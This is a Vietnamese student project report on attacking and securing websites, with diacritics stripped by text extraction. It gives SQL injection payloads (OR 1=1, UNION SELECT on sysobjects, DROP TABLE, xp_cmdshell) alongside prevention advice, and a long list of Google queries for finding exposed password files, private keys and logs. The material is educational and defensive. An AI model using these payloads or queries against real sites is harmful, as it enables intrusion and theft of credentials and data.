da tim hieutan cong va bao mat web - duong hoang dai - nguyentuandat
TRANSCRIPT
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
1/98
BCNG THNG
TRNG CAO NG K THUT CAO THNG
KHOA IN T - TIN HC
N:
TM HIU V TN CNG VBO MT WEBSITE
Gio vin hng dn: C Nguyn Th Thanh Thun
Nhm sinh vin thc hin:
Dng Hong i MSSV: 306081018
Nguyn Tun t MSSV: 306081020
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
2/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
2
Nhn xt ca gio vin
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
.....................................................................................................................
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
3/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
3
Mc lc
I. Gii thiu chung .................................................................... trang 04
II. Mt scch thc tn cng website ...................................... trang 11
1. Sdng li SQL- Injection ............................................... trang 11
2. SdngCng ctm kim ca Google........................... trang 17
3. Sdng JavaScript Inline ............................................. trang 25
4. DDOS .............................................................................. trang 28
III. Mt scch bo mt cho website ........................................ trang 29
1. SSL(Secure Socket Layer) ............................................. trang 29
2. Cc cng ckho st v tm li cho webserver .............. trang 71
* Super Scan ................................................................... trang 75
*SNIFFER ....................................................................... trang 78
*CAIN .............................................................................. trang 81
IV. Kt lun ................................................................................. trang 98
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
4/98
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
5/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
5
I. Gii thiu chung v website
Trc khi tm hiu vn tn cng v bo mt website, chng ta hy tim hiu
website l g? V chng hot ng nh thno?
Website l mt i ch mng dng http://www.companyname.com hay
http://www.companyname.com.vn .trong c cha nhu trang web th
hin nhiu thng tin siu vn bn nh: hnh nh, m thanh, flash, v mt
hay nhiu chno v c lp trnh bi mt mt ngn ngno , v
dnh html, C#, php, Website c m bi mt trnh duyt no c sn
trong my tnh ca bn, v dnh Internet Explorer, Google Chrome, Opera,
Thng thng, website c chia thnh 2 loi:
- Website tnh: l website khng c C S D Liu m ch l cc trang
web do ngi thit k to thnh bng cc phn mm to trang website.
Website ny thch hp cho nhng ni dung trnh by phc tp, i hi cao v
ha v t thay i v ni dung v vic cp nht website ny phi do nhngngi c chuyn mn thc hin v kh tn cng.
- Website ng: l website c C S D Liu do cc cng ty thit k chuyn
nghip xy dng v s bn giao cng c qun l, cp nht website cho khch
hng. Vic cp nht website rtn gin v tin li. Thng tin trn website
thng xuyn c cp nht v khng gii hn lng thng tin.
Trang web l mt trang trong mt website no c dng nhhttp://www.companyname.com/example.html . Trong example.html l tn
ca trang web .
Tn min (domain): tn min chnh l a chwebsite, website bt buc phi
c tn min. Tn min c nhiu dng www.abc.com hay www.abc.net hay
www.abc.com.vn... C nhng website khng mua tn min ring m dng tn
min con (sub-domain) dng www.abc.com/xyz. Dng tn min con nh vy
http://www.companyname.com/http://www.companyname.com/http://www.companyname.com.vn/http://www.companyname.com.vn/http://www.companyname.com/example.htmlhttp://www.companyname.com/example.htmlhttp://www.companyname.com/example.htmlhttp://www.companyname.com.vn/http://www.companyname.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
6/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
6
khng phi tn tin mua m trn nguyn tc l website m (tc
www.abc.com) c thm vi trm, nghn tn min con nh th.
Dch v lu tr (hosting): mun nhng trang web c hin ln khi ngi ta
truy cp n th chng phi c lu tr trn mt my tnh (my phc v -
server) m lc no cng hot ng v kt ni vi mng Internet. Nu my tnh
ny c s c b tt trong mt thi im no th lc khng ai truy cp
c nhng website lu tr trn my tnh . Ty theo nhu cu m doanh
nghip c th chn mua hosting vi dung lng 10MB (tc cha c ti a
10MB d liu), 20MB, 50MB, 100MB hay nhiu hn. Gi hosting hin nay
cng rt thp, chtvi chc nghn n mt hai trm nghn ng mi thng.
Hacker/Hacking: hacker l nhng ngi thch nghin cu v bo mt trn
Internet v thc tp bng cch i nh ph nhng website no s h v
bo mt. Ni chung, khng mt website no trn th gii m dm tuyn b
bo mt tuyt i. Hacker c thcp tn min ca website, c ththay i
ni dung ca website, c th tn cng t (cc lnh yu cu server hot
ng) lm cho website bt lit trong mt khong thi gian. Nhng vic ny
doanh nghip nn hi nh cung cp dch v hosting ca mnh xem h c
chnh sch phc hi nh thno.
Nh vy, mt website th cn phi c mt tn min (Domain) , mt ni lu tr
cc trang web (Hosting) v c s d liu (Database) lun kt ni internet.
Bo mt website l g? Ti sao chng ta cn phi bo mt website?
Bo mt website l dng nhng cng c bo mt website m bo an ton
cho website ca mnh, ngn chn ti a s tn cng ca cc Hacker mun
xm nhp v ph hoi hoc ly thng tin mt trong website ca mnh, m
bo c s d liu c an ton.
V sao cn bo vc s d liu ca website ? C s d liu ca website l
mt phn rt quan trong ca mt cng ty, nu mt c s d liu ny sgy
nh hng nghim trng n hot ng ca cng ty. V d : mt cng ty abc
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
7/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
7
c trang web : abc.com.vn b hacker tn cng v sa d liu ca website
thnh mt cng ty khc, nhng ngi c nhu cu lin lc vi cng ty thng
qua website s cm thy tht vng vcng ty ny, bi website ca h b
hack, nh vy l nh hng n danh tin ca cng ty, cha kn vic cchacker cung cp thng tin ti chnh hay cc dn ca cng ty ny cho cc
cng ty khc ang c nhu cu cnh tranh, lm thit hi ti sn ca cng ty.
Mt cng ty c s hu mt website s rt nguy him. Th ti sao cng ty no
cng c mt website cho ring mnh? Di y l mt sl do :
1. Thit lp s hin din
C xp x 300 triu ngi trn th gii truy cp vo mng Internet v slng ny khng ngng c tng ln hng ngy. Vic tip cn c d ch1% nhm khchhng ny cng l 1 thnh cng ca doanh nghip.
l mt phn khng nh ca cng ng x hi, hy cho h bit rng bnquan tm ti vic phc v c cng ng ny, bn cn phi c mt trn mngInternet. Bn nn bit rng, i th cnh tranh ca bn cng ang lm nhvy.
2. Tn dng hon ton cc c hi tip xcNhiu khi cng vic kinh doanh c hiu mt cch n gin l giao tip vikhch hng. Mi doanh nhn khn ngoan u hiu rng: "B quyt thnh cngkhng nm ch nhng g bn bit m chnh l ch bn bit ti nhngkhch hng no". Cc doanh nhn u mun tn dng cc cuc gp g thngthng thnh cng vic kinh doanh c li v vic trao danh thip l mt vicc coi trng trong qu trnh ny. Nhng iu g s xy ra khi doanh nghipcn phi gp g hng ngn, thm ch hng triu i tc lm n, liu ccdoanh nghip c th tip xc cng mt lc vi tt c cc khch hng. iu
ny c th c gii quyt ht sc n gin, ti mi lc, mi ni, mi thiim thng qua cc trang Web trn mng Internet.
3. To ra ngun thng tin sn c cho i tc
Khi bn mun to cc trang thng tin, qung co, c th bn s ng chngtrn mc qung co, trang vng, nhng thi gian s lm cho bn phi tnh li.V, lm th no khch hng quan tm c th lin h c ngay vi bn?Phng thc thanh ton trong mi dch v s nh th no? Qung co trangvng s kh khn trong vic ny v y vn ch l mt loi phng tin truyn
thng c khong cch. Trong thi i hin nay, cc thng tin i hi phinhanh chng hn v mang tnh a chiu hn. Internet s gip bn lm c
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
8/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
8
iu thng qua nhng trang thng tin c duy tr lin tc 24/24 gi trongngy v 07 ngy trong tun. Khch hng c th xem thng tin v doanhnghip ca bn bt k lc no h mun, thmch ngay c khi bn ang ng.
4. Phc v khch hng hiu qu
Cng ngh Internet s mang li cho doanh nghip ca bn nhiu cch hn phc v khch hng. Liu bn c i ng nhn vin trc in thoi tipnhn cc yu cu ca khch hng v cung cpthng tin dch v m h cn?Liu khch hng c th t ng tra cu vo c s d liu, tm kim cc thngtin v dch v bn ang tin hnh m h mun khng? Tt c iu ny khchhng c th l c 1 cch n gin v nhanh chng thng qua chnhWebsite ca doanh nghip bn.
5. Thu ht s quan tm ca dn chng
Bn kh m thuyt phc c cc tp ch ng bi v vic bn khai trngmt ca hng mi nhng bn li c th thuyt phc c h ng bi nu tnWebsite ca bn v trang Web mi v c nhiu iu th v. Vi cc thngtin nh vy, bt k ngi s dng Internet no cng c th truy cp voWebsite tm hiu v doanh nghip ca bn v c th tr thnh khch hngtim nng.
6. Cng b thng tin vo bt k thi gian no
Nu bn cn phi cng b cc ti liu trc lc na m th s nh th no?Gi s l tin khn cp, cng b cc gii thng ca chng trnh khuynmi,... Nu bn gi cc tin ny ti cc ta son bo th bn s gp phi trngi v thi gian: Thng tin ca bn ch c pht hnh cng vi gi phthnh ca bo v khng th thay i sau khi bo c pht hnh. ViInternet, bn hon ton c th thay i tin tc mi cho Website ca doanhnghip trong vng vi giy ng h, nhng thng tin mi nht s c cpnht v s c chuyn ti nhng ngi mong i m khng phi qua bt kngi a tin no.
7. bn hng ha
Internet em li cho doanh nghip ca bn mt c hi ln bn c th bnhng ha. S pht trin ca Internet trn ton th gii ko theo s ra i vm rng camt th trng khch hng mi y tim nng - cng ng ngis dng Internet. Liu bn c nn chn ch khi m cc i th cnh tranhtrong kinh doanh ca bn ang dn tng bc thm nhp v chim lnh thphn trn Internet?
8. Gii thiu sn phm sinh ng
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
9/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
9
Nu sn phm ca bn l nhng chic my th khch hng s thc s bthuyt phc khi nhn thy n hot ng ra sao. Internet m ra cho bn nhiucch thc gii thiu sn phm tht sinh ng ti khch hng thng quaWebsite bng hnh nh, m thanh, cc on phim ngn, iu ny s khin cckhch hng tim nng s n vi bn nhiu hn, khng mt quyn sch giithiu no c th lm c nh vy.
9. Vn ti mt th trng dn chng c thu nhp cao
S lng ngi tham gia vo mng Internet c th to ra mt th trng snc ng o nht. Nhng ngi s dng Internet thng l nhng ngi ctrnh hc vn, c hiu bit v a v n nh, thu nhp cao trong x hi.Chnh v vy, tip cn c v chim lnh th trng khch hng ny l ium bt kdoanh nghip kinh doanh no cng mong mun t c.
10. Tr li cc cu hi thng gp
Bt k ngi trc in thoi no trong cng ty bn cng u ni rng h dngphn ln thi gian ca mnh tr li cc cu hi gn nh ging nhau. lnhng cu him cc khch hng mun hi trc khi h giao dch vi bn.
a nhng cu hi ny ln Website s gip bn loi b c nhng ro chni vi cng vic kinh doanh v gii phng bt thi gian cho nhn vin trcin thoi.
11. Gii quyt thng tin ni b
Cc nhn vin bn hng lu ng c th cn nhng thng tin cp nht tngpht gip h bn hng cng nh gip cho vic kinh doanh lun n . Nubn bit thng tin g cn thit, bn c th a chng ln 1 Website ring. Vimt cuc truy cp Internet thngqua in thoi ni ht, nhn vin bn hngca doanh nghip bn bt k ni u trn th gii s nhn c nhngthng tin y nht m khng phi tr cc ph ng di v nhng nhnvin vn phng khng bn rn thm.
12. M rng ra th trng quc t
Vi vic kinh doanh thng thng bn khng th gi th, in thoi hay phbin cc quy nh ti tt c mi khch hng tim nng trn th trng th gii,nhng vi Website bn c th hi thoi trc tip vi khch hng quc t nhl vi mt khch hng trong ni ht. Khi doanh nghip ca bn c cc vnphng i din nc ngoi, h s truy cp vo ngun thng tin ca vnphng trong nc vi chi ph phi tr vh bng mt cuc in thoi gi ni ht.
13. Hnh thnh dch v 24 gi
Chng ta khng phi lcno cng c nhng cng vic cng chung mt lchtrnh. Cng vic kinh doanh l khp mi lc, mi ni ch khng phi ch l thi
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
10/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
10
gian cng s. Khi cng vic kinh doanh gia Chu u v Chu ang thchin th s khc bit v thi gian s l iu cn trln. Cc Website s phcv khch hng v cc i tc ca bn 24/24 gi trong ngy, 07/07 ngy trongtun. Thng tin c th c khch hng la chn theo nhu cu v cc thngtin m h coi l quan trng, chnh iu ny s a bn dn u trong cuccnh tranh ngay c khi bn ngoi vn phng lm vic.
14. Thay i thng tin hin thi 1 cch nhanh chng
C nhng thng tin b thay i trc khi n c in ra. V bn s c mt nggiy t c cng nh khng c gi tr ln ln nhau. Cc n phm in t c ththay i theo nhu cu ca bn m khng cn n giy t, bt mc hay han. Bn cn c th gn Website ca doanh nghip vi 1 c s d liu mbn c th thay i bao nhiu ln trong 1 ngy cng c ty theo yu cu.Chng c giy t no c th gip bnthc hin c s nng ng .
15. Cho php bn tip nhn thng tin phn hi t pha khch hng
Vi Website bn c th yu cu thng tin phn hi t pha khch hng ngaylp tc khi h ang gh thm Website ca doanh nghip bn. iu ny gipbn tit kim c rt nhiu thi gian v tin bc hoch nh cc chinlc qung co v kinh doanh trn c s nhng thng tin nm bt c tpha khch hng m khng phi mt thm khon chi no na. Cu tr li cakhch hng c a ln Website ngay khi khchhng tm hiu sn phm vc chuyn lp tc ti a ch e-mail ca bn.
16. Th nghim dch v v sn phm mi trn th trng
Khi a ra mt sn phm mi trn th trng, iu m tt c cc doanhnghip phi lm l qung co v gii thiu sn phm . Vi cc phngphp qung co truyn thng, y s l mt cng on rt tn km v i hikinh ph ln. Nhng nu bn gii thiu, qung co sn phm mi trnWebsite ca doanh nghip bn, bn s bit rng c th ch i g t nhngkhch hng truy cp voWebsite, h chnh l th trng t tn km nht mbn vn ti. H cn c th cho bn bit h ngh g v sn phm ca bn 1
cch nhanh nht, d dng nht vi mt chi ph t hn bt k th trng no mbn vn ti.
17. Phng tin truyn thng linh hot
Ngy nay, Internet c nh gi l h thng truyn dn chuyn nghip nhtbi v sn phm chnh ca n l cc thng tin c tip cn mt cch ddng, nhanh chng v r tin. Tt c cc n phm c truyn trn Internetang ngy cng tr nn ph bin bi v cc cng vic u c thc hintrong mi trng k thut s t rt nhiu ngun thng tin cung cp. Tt c
nhng cng vic ny thc hin mt cch d dng thng qua cc trang Webtrn chnh Website ca doanh nghip bn.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
11/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
11
18. Tip cn mt th trng ca gii tr v mang tnh gio dc
hu ht cc trng i hc u cho sinh vin tip cn vo Internet, giihc sinh ph thng s tng bc lm quen v s dng dch v Internet trongnhiu nm ti. Nhu cu v sch v, trang phc th thao, cc kha hc, thitrang tr v rt nhiu th khc s tr thnh nhu cu a dng ca th trngtrn Internet. Thm ch ngay c khi p dng dch v thng mi in t trnmng v tui th trung bnh c phn tng ln th s tng trng ca khu vcth trng tui di 25vn tip tc.
19. Tip cn mt th trng c tnh chuyn nghip
Mng Internet khng n thun ch l nhng my tnh m n cn l ni mingi c th mua bn, trao i bt k th g t chic bn chi nh rng, cctc phm ngh thut cho n cc bi hc ting Anh,... Vi 70 triu ngi s
dng thng xuyn v s lng ngi s dng tng ln hng ngy, thng tinkinh doanh ca bn c th c gii thiu cho mt s lng ngi rt ln.
20. Phc v ti th trng a phng
Chng ta ni v sc mnh ca vic phc v nhu cu trn th trng quct thng qua Internet, nhng cn khu vc th trng ngay a phng cabn th sao? Cu tr li l: chnh khch hng trong a phng bn thng quacc hot ng marketing, h s bit ti Website, truy cp thng tin trnInternet v mang li li nhun cho cng ty bn. Cho nn d cng ty c t
u th thng qua mng Internet, nhng khch hng tim nng vn bit nbn v bn cng s sn sng phc v h.
II. Mt scch thc tn cng website
1. S dng li SQL injection
1.1 SQL Injection l g?
Khi trin khai cc ng dng web trn Internet, nhiu ngi vn ngh rngvic m bo an ton, bo mt nhm gim thiu ti a khnng b tn cngtcc tin tc chn thun tp trung vo cc vn nh chn hiu hnh,h qun trc s d liu, webserver s chy ng dng, ... m qun mt rngngay c bn thn ng dng chy trn cng tim n mt l hng bo mtrt ln. Mt trong scc l hng ny l SQL injection. Ti Vit Nam, qua thi k cc qun tr website l l vic qut virus, cp nht cc bn v li tcc phn mm h thng, nhng vic chm sc cc li ca cc ng dng lirt t c quan tm. l l do ti sao trong thi gian va qua, khng twebsite ti Vit Nam b tn cng v a su l li SQL injection [1]. Vy SQLinjection l g ?
SQL injection l mt k thut cho php nhng k tn cng li dng lhng trong vic kim tra d liu nhp trong cc ng dng web v cc thng
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
12/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
12
bo li ca h qun trc s d liu "tim vo" (inject) v thi hnh cc culnh SQL bt hp php (khng c ngi pht trin ng dng lng trc).Hu qu ca n rt tai hi v n cho php nhng k tn cng c th thc hincc thao tc xa, hiu chnh, do c ton quyn trn c s d liu ca ngdng, thm ch l server m ng dng ang chy. Li ny thng xy ratrn cc ng dng web c d liu c qun l bng cc h qun trc s dliu nh SQL Server, MySQL, Oracle, DB2, Sysbase.
1.2. Cc dng tn cng bng SQL Injection
C bn dng thng thng bao gm: vt qua kim tra lc ng nhp(authorization bypass), s dng cu ln SELECT, s dng cu lnh INSERT,s dng cc stored-procedures [2], [3].
Dng tn cng vt qua kim tra ng nhp
Vi dng tn cng ny, tin tc c th ddng vt qua cc trang ngnhp nhvo li khi dng cc cu lnh SQL thao tc trn c s d liu cang dng web.
Xt mt v din hnh, thng thng cho php ngi dng truy cpvo cc trang web c bo mt, h thng thng xy dng trang ng nhpyu cu ngi dng nhp thng tin vtn ng nhp v mt khu. Sau khingi dng nhp thng tin vo, h thng s kim tra tn ng nhp v mtkhu c hp lhay khng quyt nh cho php hay t chi thc hin tip.
Trong trng hp ny, ngi ta c thdng hai trang, mt trang HTML hin th form nhp liu v mt trang ASP dng x l thng tin nhp t
pha ngi dng. V d:
execlogin.asp
login.htmUsername:
Password: -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
13/98
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
14/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
14
cho mt gi trkhc, v t, khi u cho mt cuc tn cng bt hp php,v dnh: 0 OR 1=1(ngha l, http://www.myhost.com/shownews.asp?ID=0or 1=1).
Cu truy vn SQL lc ny s tr v tt ccc article t bng d liu v
n s thc hin cu lnh:SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Mt trng hp khc, v dnh trang tm kim. Trang ny cho phpngi dng nhp vo cc thng tin tm kim nh H, Tn, on mthng gp l:
Tng tnh trn, tin tc c th li dng s htrong cu truy vn SQL nhp vo trng tn tc gi bng chui gi tr:
' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE''=' (*)
Lc ny, ngoi cu truy vn u khng thnh cng, chng trnh sthc hin thm lnh tip theo sau tkha UNION na.
Tt nhin cc v dni trn, dng nh khng c g nguy him, nhnghy thtng tng k tn cng c thxa ton bc s d liu bng cchchn vo cc on lnh nguy him nh lnh DROP TABLE. V d nh: '
DROP TABLE T_AUTHORS -Chc cc bn s thc mc l lm sao bit c ng dng web b li
dng ny c. Rt n gin, hy nhp vo chui (*) nh trn, nu h thngbo li vc php dng: Invalid object name OtherTable; ta c th bit chcl h thng thc hin cu SELECT sau tkha UNION, v nh vy mi cth tr v li m ta ctnh to ra trong cu lnh SELECT.
Cng sc thc mc l lm thno c th bit c tn ca cc bngd liu m thc hin cc thao tc ph hoi khi ng dng web b li SQLinjection. Cng rt n gin, bi v trong SQL Server, c hai i tng l
sysobjects v syscolumns cho php lit k tt ccc tn bng v ct c trongh thng. Ta chcn chnh li cu lnh SELECT, v d nh:
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
15/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
15
' UNION SELECT name FROM sysobjects WHERE xtype = 'U' l cth lit k c tn tt ccc bng d liu.
Dng tn cng s dng cu lnh INSERTThng thng cc ng dng web cho php ngi dng ng k mt ti
khon tham gia. Chc nng khng th thiu l sau khi ng k thnh cng,ngi dng c thxem v hiu chnh thng tin ca mnh. SQL injection c thc dng khi h thng khng kim tra tnh hp l ca thng tin nhp vo.
V d, mt cu lnh INSERT c th c c php dng: INSERT INTOTableName VALUES('Value One', 'Value Two', 'Value Three'). Nu on mxy dng cu lnh SQL c dng :
Th chc chn s b li SQL injection, bi v nu ta nhp vo trng thnht v dnh: ' + (SELECT TOP 1 FieldName FROM TableName) + '. Lc
nycu truy vn s l: INSERT INTO TableName VALUES(' ' + (SELECTTOP 1 FieldName FROM TableName) + ' ', 'abc', 'def'). Khi , lc thc hinlnh xem thng tin, xem nh bn yu cu thc hin thm mt lnh na l: SELECT TOP 1 FieldName FROM TableName
Dng tn cng s dng stored-procedures
Vic tn cng bng stored-procedures sgy tc hi rt ln nu ngdng c thc thi vi quyn qun tr h thng 'sa'. V d, nu ta thay onm tim vo dng: ' ; EXEC xp_cmdshell cmd.exe dir C: '. Lc ny hthng s thc hin lnh lit k th mc trn a C:\ci t server. Vic phhoi kiu no tu thuc vo cu lnh ng sau cmd.exe.
1.3. Cch phng trnh
Nh vy, c th thy li SQL injection khai thc nhng bt cn ca cclp trnh vin pht trin ng dng web khi x l cc d liu nhp vo xydng cu lnh SQL. Tc hi t li SQL injection ty thuc vo mi trng vcch cu hnh h thng. Nu ng dng s dng quyn dbo (quyn ca ngis hu c s d liu - owner) khi thao tc d liu, n c thxa ton bccbng d liu, to cc bng d liu mi, Nu ng dng s dng quyn sa(quyn qun tr h thng), n c thiu khin ton b h qun trc s dliu v vi quyn hn rng ln nh vy n c th to ra cc ti khon ngidng bt hp php iu khin h thng ca bn. phng trnh, ta c th
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
16/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
16
thc hin hai mc:
1.3.1. Kim sot cht ch d liu nhp vo
phng trnh cc nguy c c th xy ra, hy bo vcc cu lnhSQL l bng cch kim sot cht ch tt ccc d liu nhp nhn c t
i tng Request (Request, Request.QueryString, Request.Form,Request.Cookies, and Request.ServerVariables). V d, c th gii hn chiudi ca chui nhp liu, hoc xy dng hm EscapeQuotes thay thccdu nhy n bng 2 du nhy n nh:
Trong trng hp d liu nhp vo l s, li xut pht t vic thay thmt gi trc tin on l d liu s bng chui cha cu lnh SQL bthp php. trnh iu ny, n gin hy kim tra d liu c ng kiu haykhng bng hm IsNumeric().
Ngoi ra c thxy dng hm loi b mt sk tv tkha nguyhim nh: ;, --, select, insert, xp_, ra khi chui d liu nhp tpha
ngi dng hn chcc tn cng dng ny:
1.3.2. Thit lp cu hnh an ton cho h qun trc s d liu
Cn c c ch kim sot cht chv gii hn quyn xl d liu nti khon ngi dng m ng dng web ang s dng. Cc ng dng thngthng nn trnh dng n cc quyn nh dbo hay sa. Quyn cng b hn
ch, thit hi cng t.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
17/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
17
Ngoira trnh cc nguy c tSQL Injection attack, nn ch loi bbt k thng tin k thut no cha trong thng ip chuyn xung cho ngidng khi ng dng c li. Cc thng bo li thng thng tit lcc chi tit kthut c thcho php k tn cng bit c im yu ca h thng.
Tham chiu[1]. Danh sch cc website b li SQL injection: http://www.security.com.vn/[2]. SQL Injection FAQ:
http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=2&tabid=3 [3].
Advanced SQL Injection :
http://www.nextgenss.com/papers/advanced_sql_injection.pdf [4].
Preventing SQL Injection:
http://www.owasp.org/asac/input_validation/sql.shtml [5]. SQL Injection
Attacks -Are You Safe? http://www.sitepoint.com/article/794
2. S dng cng ctm kim ca Google
Google l my tm kim mnh mv ph bin nht th gii,n c khnng chp nhn nhng lnh c nh ngha sn khi nhp vo v cho nhngkt qukhng thtin c. iu ny cho php nhng ngi dng c d tmnh tin tc, crackers, v script kiddies v.v... s dng my tm kim Google thu thp nhng thng tin b mt v nhy cm, nhng ci m khng thnhn
thy qua nhng tm kim thng thng.Vi nhng c php tm kim nng caoc thtm ra nhng site li hoc server d b tn cng.
Nhng c php tm kim nng cao vi Google
[intitle:]
Gip Google gii hn kt qutm kim v nhng trang c cha ttrong tiu . V d, intitle: login password (khng c ngoc kp) s cho ktqul nhng link n nhng trang c t"login" trong tiu , v t
"password" nm u trong trang.
Tng t, nu ta mun truy vn nhiu hn mt ttrong tiu ca trang thta c thdng allintitle: thay cho intitle c kt qul nhng trang ccha tt c nhng t trong tiu . V dnh dng:intitle: login intitle: password cng ging nh truy vn allintitle: loginpassword.
Mt scu lnh intitle ph bin:
intitle:"Index of" service.pwd
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
18/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
18
Directory listing contains service.pwd file(s)intitle:"Index of" view-sourceDirectory listing contains view-source file(s)intitle:"Index of" adminDirecory listing contains administrative files or directoriesintitle:"Index of" .htpasswdDirectory listing contains .htpasswd file!intitle:"Index of" log.txtDirectory listing contians log text filesintitle:"Index of" stats.htmlDirectory listing contains stats.html which may contain useful web server
statistics"access denied for user" "using password"Web page contains error message which might provide useful
application information"A syntax error has occurred" filetype:ihtmlWeb page contains error message which might provide useful
application information"ORA-00921: unexpected end of SQL command"Web page contains error message which might provide useful
application informationinurl:passlist.txtThe passlist.txt file may contain user passwords"Index of /backup"Directory may contain sensitive backup filesintitle:"Index of" .bash_historyDirectory listing contains bash history informationintitle:"Index of" index.html.bakDirectory listing contains backup index file (index.html.bak)intitle:"Index of" index.php.bakDirectory listing contains backup index file (index.html.bak)intitle:"Index of" guestbook.cgiDirectory listing contains backup index file (index.html.bak)intitle"Test Page for Apache"
Default test page for Apacheintitle:index.of.etcDirectory listing of /etc ?filetype:xls username passwordXLS spreadseet containing usernames and passwords?"This file was generated by Nessus"Nessus report!intitle:"Index of" secring.bakSecret key fileintitle:"Terminal Services Web Connection"
Access terminal services!intitle:"Remote Desktop Web Connection"
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
19/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
19
Access Remote Desktop!intitle:"Index of" access_logDirectory listing contains access_log file which may store sensitive
informationintitle:"Index of" finance.xlsDirectory listing contains finance.xls which may contain sensitive
informationintitle:"Usage Statistics for"Statistical information may contain sensitive dataintitle:"Index of" WSFTP.LOGWSFTP.LOG file contains information about FTP transactionsintitle:"Index of" ws_ftp.iniDirectory listing contains password file(s)?The ws_ftp.ini file may contain usernames and passwords of FTP users"not for distribution" confidentialURL may contain confidential or sensitive information"phpMyAdmin" "running on" inurl:"main.php"phpMyAdmin allows remote mysql database administration"#mysql dump" filetype:sqlmysql database dumps"This summary was generated by wwwstat"Database statistics"Host Vulnerability Summary Report"Vulnerability report!"Network Vulnerability Assessment Report"Vulnerability report!inurl:php.ini filetype:iniThe php.ini file may contain sensitive PHP environment details.BEGIN (CERTIFICATE|DSA|RSA) filetype:keyPrivate key(s)!BEGIN (CERTIFICATE|DSA|RSA) filetype:csrPrivate key(s)!BEGIN (CERTIFICATE|DSA|RSA) filetype:crtPrivate key(s)!
intitle:"Index of" passwd passwd.bakpasswd file!intitle:"Index of" master.passwdmaster.passwd file!intitle:"Index of" pwd.dbpwd.db file may contain password informationintitle:"Index of..etc" passwdpasswd file!filetype:cfg ks intext:rootpw -sample -test -howtoThis file may contain the root password (encrypted)
intitle:"index.of.personal"Directory may contain sensitive information
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
20/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
20
intitle:"Index of" login.jspThe login.jsp file may contain database username or password
informationintitle:"Index of" logfileDirectory may contain sensitive log filesfiletype:php inurl:"viewfile" -"index.php" -"idfilFile may contain PHP source codeallinurl:intranet adminPage may contain sensitive information"supplied argument is not a valid MySQL result resource"mysql error message may reveal sensitive information"Error Diagnostic Information" intitle:"Error Occurred While"Error message may reveal sensitive informationHTTP_USER_AGENT=GooglebotPage may contain sensitive environment details
[ inurl: ]
C php inurl: gii hn kt qutm kim v nhng a chURL c cha tkha tm kim. V d: inurl: passwd (khng c ngoc kp) s cho kt qulnhng link n nhng trang c t "passwd" trong URL.Tng t, nu ta mun truy vn nhiu hn mt t trong URL th ta c thdng allinurl: thay cho inurl c kt qul nhng URL cha tt c
nhng tkha tm kim.V d: allinurl: etc/passwd stm kim nhng URLc cha etc v passwd. K hiu gch cho (/) gia cc t s b Googleb qua.
[ site: ]
